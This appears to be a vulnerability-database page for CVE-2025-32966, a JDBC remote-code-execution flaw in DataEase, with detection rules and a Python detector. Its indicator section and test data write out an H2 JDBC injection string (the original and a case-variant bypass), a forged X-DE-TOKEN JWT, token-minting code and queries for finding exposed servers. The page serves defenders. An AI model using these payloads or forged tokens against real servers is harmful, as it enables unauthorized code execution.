CVE-2025-32966
Published: 2025-04-23
Priority: P2 · 68 · Severity: critical · CVSS 3.1 base score: 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploit: available · EPSS: 3.92% (89.0th percentile)
DataEase is an open-source BI tool alternative to Tableau. Prior to version 2.10.8, authenticated users can complete RCE through the backend JDBC link. This issue has been patched in version 2.10.8.
Affected
2 distinct ranges (the sources list the < 2.10.10 range twice; the duplicate row is dropped)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dataease | dataease | < 2.10.8 | 2.10.8 |
| dataease | dataease | < 2.10.10 | 2.10.10 |
The CVE description gives 2.10.8 as the fixing release; a < 2.10.10 range is also reported, so upgrading to 2.10.10 or later covers both entries.
Detection & IOCs (extracted from sources)

Indicators:
- Cookie / header 'X-DE-TOKEN': eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8 (the two base64url segments decode to the header {"typ":"JWT","alg":"HS256"} and the payload {"uid":1,"oid":1})
- JDBC string (other): jdbc:h2:mem:pwn;MODE=MSSQLServer;INIT=CREATE ALIAS LK AS $$void lk() throws java.io.IOException { java.net.InetAddress.getByName("{{unique}}")\; }$$\;CALL LK() (the INIT clause defines a Java-source alias and immediately calls it; InetAddress.getByName forces a DNS lookup of whatever hostname replaces the {{unique}} placeholder, so this variant confirms code execution through an out-of-band DNS callback rather than by running a command)

Detection guidance:
- Detect exploit attempts by matching HTTP POST requests to /de2api/datasource/validate or /de2api/datasource/getSchema whose body, or base64-encoded configuration field, contains an H2 JDBC string (jdbc:h2:mem:) together with INIT, RUNSCRIPT, or a case-variant equivalent (e.g., in\it).
- Alert on responses from DataEase datasource endpoints containing 'Exception calling user-defined function' combined with 'CREATE ALIAS'; this indicates the H2 JDBC code path executed.
- Flag requests to DataEase datasource API endpoints bearing a forged or static X-DE-TOKEN JWT header (especially with uid:1, oid:1 claims and HS256 signed with a weak or known key). The sources cite 'ChrisJr404' as one such key; note that this is also the handle of the CVE-2025-32966 template author listed below, so confirm the secret against the PoC before treating it as an indicator.
- Use FOFA query app="FIT2CLOUD-DataEase" or Shodan query http.html:"DataEase" to identify exposed DataEase instances for proactive scanning.
- The bypass (CVE-2025-49002) uses mixed-case variants of blocked keywords (e.g., 'in\it' instead of 'INIT', 'CREAT\E' instead of 'CREATE') to evade a case-sensitive blocklist; detection rules should be case-insensitive and should normalize such variants before matching.

Notes and caveats:
- The static JWT used in the CVE-2025-49002 PoC (X-DE-TOKEN with uid:1, oid:1) relies on a weak or default HMAC secret. Deployments using a non-default JWT secret require a valid authenticated token, so unauthenticated exploitation depends on a known or guessable secret.
- CVE-2025-32966 originally required user authentication ('exploit requires user authentication'), but the related bypass CVE-2025-49002 template uses a forged JWT, suggesting the authentication control can be bypassed when the signing key is known or weak.
- The CVE-2025-49002 Nuclei template is described as non-invasive and does not attempt authentication bypass, JDBC exploitation, or command execution; it is for version-hint detection only. The base64 payload embedded in the template does, however, contain a full RCE payload and should be treated as sensitive.
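The request-side and response-side rules above, implemented as an added example (this is not the page's, DataEase's or either Nuclei template's code). It assumes the datasource 'configuration' field is base64-encoded JSON, as the notes state, and it goes slightly beyond the notes by stripping backslashes as well as case-folding so that the 'in\it' / 'CREAT\E' variants collapse to the plain keywords. The sample traffic, the benign request and the list of candidate HMAC secrets are constructed for the demonstration; the page's X-DE-TOKEN value is decoded for its claims only, and its signature is checked against the candidate list without assuming any of them is correct.

```python
import base64
import hashlib
import hmac
import json
from typing import Dict, List, Optional

# Endpoints and keywords named in the detection notes above.
TARGET_PATHS = ("/de2api/datasource/validate", "/de2api/datasource/getSchema")
H2_MARKER = "jdbc:h2:mem:"
H2_KEYWORDS = ("init=", "runscript", "create alias")


def normalize(text: str) -> str:
    """Case-fold and drop backslashes so 'in\\it' and 'CREAT\\E' match 'init' and 'create'."""
    return text.replace("\\", "").lower()


def b64url_decode(part: str) -> bytes:
    """Decode a base64url segment, restoring the padding JWTs omit."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def try_b64_decode(value: str) -> Optional[str]:
    """Decode a standard-base64 string field (DataEase's 'configuration'), or None if it is not one."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except Exception:  # not base64, bad padding, or not UTF-8
        return None


def h2_payload_hits(body: str) -> List[str]:
    """Return the H2 keywords found in the raw body or in any base64-decoded string field."""
    texts = [body]
    try:
        doc = json.loads(body)
    except ValueError:
        doc = {}
    if isinstance(doc, dict):
        for value in doc.values():
            decoded = try_b64_decode(value) if isinstance(value, str) else None
            if decoded:
                texts.append(decoded)
    hits: List[str] = []
    for text in texts:
        norm = normalize(text)
        if H2_MARKER in norm:
            hits += [k for k in H2_KEYWORDS if k in norm and k not in hits]
    return hits


def jwt_parts(token: str) -> Dict[str, dict]:
    """Decode header and payload of a compact JWT without verifying it."""
    try:
        header_b64, payload_b64, _sig = token.split(".")
        return {"header": json.loads(b64url_decode(header_b64)),
                "payload": json.loads(b64url_decode(payload_b64))}
    except (ValueError, TypeError):
        return {"header": {}, "payload": {}}


def find_weak_secret(token: str, candidates: List[str]) -> Optional[str]:
    """Return the first candidate HS256 secret whose signature matches the token, else None."""
    signing_input, sig_b64 = token.rsplit(".", 1)
    sig = b64url_decode(sig_b64)
    for secret in candidates:
        mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
        if hmac.compare_digest(mac, sig):
            return secret
    return None


def mint_hs256(secret: str, payload: dict) -> str:
    """Build an HS256 JWT; used only to construct a sample forged token for the demo."""
    def enc(raw: bytes) -> str:
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    head = enc(json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":")).encode())
    body = enc(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{enc(sig)}"


def classify_request(method: str, path: str, headers: Dict[str, str], body: str,
                     weak_secrets: List[str]) -> Dict[str, object]:
    """Apply the request-side rules from the notes above to one HTTP request."""
    finding: Dict[str, object] = {"h2_keywords": [], "static_jwt_claims": False, "weak_secret": None}
    if method.upper() != "POST" or path not in TARGET_PATHS:
        return finding
    finding["h2_keywords"] = h2_payload_hits(body)
    token = headers.get("X-DE-TOKEN")
    if token:
        parts = jwt_parts(token)
        finding["static_jwt_claims"] = (parts["header"].get("alg") == "HS256"
                                        and parts["payload"].get("uid") == 1
                                        and parts["payload"].get("oid") == 1)
        finding["weak_secret"] = find_weak_secret(token, weak_secrets)
    return finding


def response_indicates_execution(body: str) -> bool:
    """Response-side rule: the H2 user-defined-function error text together with CREATE ALIAS."""
    low = body.lower()
    return "exception calling user-defined function" in low and "create alias" in low


# Constructed sample traffic for the demonstration (not captured from a real host).
PAGE_TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
              "eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8")
BYPASS_JDBC = ("jdbc:h2:mem:pwn;MODE=MSSQLServer;in\\it=CREAT\\E ALIAS LK AS "
               "$$void lk() {}$$\\;CALL LK()")
ATTACK_BODY = json.dumps({"name": "probe", "configuration":
                          base64.b64encode(json.dumps({"jdbc": BYPASS_JDBC}).encode()).decode()})
BENIGN_BODY = json.dumps({"name": "sales", "configuration":
                          base64.b64encode(b'{"jdbc":"jdbc:mysql://db:3306/sales"}').decode()})
# Candidate secrets are constructed; the notes above cite 'ChrisJr404' but it is unverified here.
CANDIDATE_SECRETS = ["changeme", "ChrisJr404"]

if __name__ == "__main__":
    print(classify_request("POST", "/de2api/datasource/validate",
                           {"X-DE-TOKEN": PAGE_TOKEN}, ATTACK_BODY, CANDIDATE_SECRETS))
```

Run against the page's token, the script reports the static uid:1 / oid:1 HS256 claims as suspicious regardless of whether any candidate secret validates the signature; 'weak_secret' stays None unless a listed secret really does match, which is the behaviour you want when the key claim has not been confirmed.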
CVSS provenance
NVD v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD v4.0: 8.2 HIGH, CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Both vectors score PR:N (no privileges required) even though the CVE description says exploitation needs an authenticated user; treat 9.8 as the upper bound that applies when the X-DE-TOKEN signing secret is default or known (see the notes above), and expect a lower effective score on deployments with a unique secret.
No advisories linked to this vulnerability.
No detection rules found.
Nuclei
CVE-2025-49002 [HIGH] DataEase - Remote Code Execution (nuclei · CVSS 8.2)
DataEase is an open-source business intelligence and data visualization platform. Public advisories state that CVE-2025-49002 is related to a bypass in the previous fix for CVE-2025-32966 involving case-insensitive handling of restricted H2 JDBC keywords. This template is a non-invasive detection template intended only to identify exposed DataEase instances and extract possible version hints for manual verification. It does not attempt authentication bypass, JDBC exploitation, or command execution.
Template (excerpt):
```yaml
id: CVE-2025-49002
info:
  name: DataEase - Remote Code Execution
  author: WeQi
  severity: high
  description: |
    DataEase is an open-source business intelligence and data visualization platform. Public advisories state that CVE-2025-49002 is related to a
```
Nuclei
CVE-2025-32966 [HIGH] DataEase 2.10.4-2.10.7 - Remote Code Execution (nuclei · CVSS 8.2)
DataEase prior to version 2.10.8 contains a remote code execution vulnerability caused by insecure backend JDBC link handling, letting authenticated users execute arbitrary code; the exploit requires user authentication.
Template (excerpt):
```yaml
id: CVE-2025-32966
info:
  name: DataEase 2.10.4-2.10.7 - Remote Code Execution
  author: ChrisJr404
  severity: critical
  description: |
    DataEase prior to version 2.10.8 contains a remote code execution caused by insecure backend JDBC link handling, letting authenticated users execute arbitrary code, exploit requires user authentication.
  impact: |
    Authenticated users can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to version 2.10.8 or later.
  reference:
    - https://github.com/d
```
No writeups or analysis indexed.